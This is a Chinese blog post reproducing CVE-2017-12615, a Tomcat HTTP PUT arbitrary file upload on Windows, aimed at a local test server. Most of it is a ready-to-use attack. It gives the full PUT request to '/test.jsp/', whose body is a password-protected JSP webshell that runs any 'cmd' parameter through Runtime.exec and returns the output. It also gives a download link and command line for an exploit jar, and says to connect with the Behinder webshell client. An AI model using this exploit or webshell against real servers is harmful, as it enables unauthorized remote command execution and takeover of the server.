当前位置:   article > 正文

Tomcat PUT方法任意文件上传(CVE-2017-12615)

Tomcat PUT方法任意文件上传(CVE-2017-12615)

目录

漏洞复现:

漏洞利用工具:


漏洞环境:当 Tomcat运行在Windows操作系统,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求上传任意文件,包括JSP类型的木马。影响范围:Apache Tomcat 7.0.0 - 7.0.81

漏洞复现:

Tomcat版本:Tomcat 7.0.39

打开Tomcat安装目录的 conf\web.xml ,添加如下配置。在Tomcat7.0版本下默认配置是开启readonly的,需要手动配置readonly为false才可以进行漏洞利用。

抓包,修改方式为OPTIONS,发现允许PUT方法

将数据包修改为如下,点击 Go (我们可以将PUT的内容修改为其他类型的JSP木马)

  1. PUT /test.jsp/ HTTP/1.1
  2. Host: 127.0.0.1:8080
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  7. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  8. Connection: close
  9. Content-Length: 423
  10. <%
  11. if("123".equals(request.getParameter("pwd"))){
  12. java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
  13. int a = -1;
  14. byte[] b = new byte[1024];
  15. out.print("<pre>");
  16. while((a=in.read(b))!=-1){
  17. out.println(new String(b));
  18. }
  19. out.print("</pre>");
  20. }
  21. %>

访问网站根目录下的test.jsp

漏洞利用工具:

https://download.csdn.net/download/qq_36119192/11665567

java -jar CVE-2017-12615-Exploit.jar http://127.0.0.1:8080/ test.jsp 木马文件的路径

然后,用冰蝎连接 http://127.0.0.1:8080/test.jsp 即可。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/寸_铁/article/detail/755987
推荐阅读
相关标签
  

闽ICP备14008679号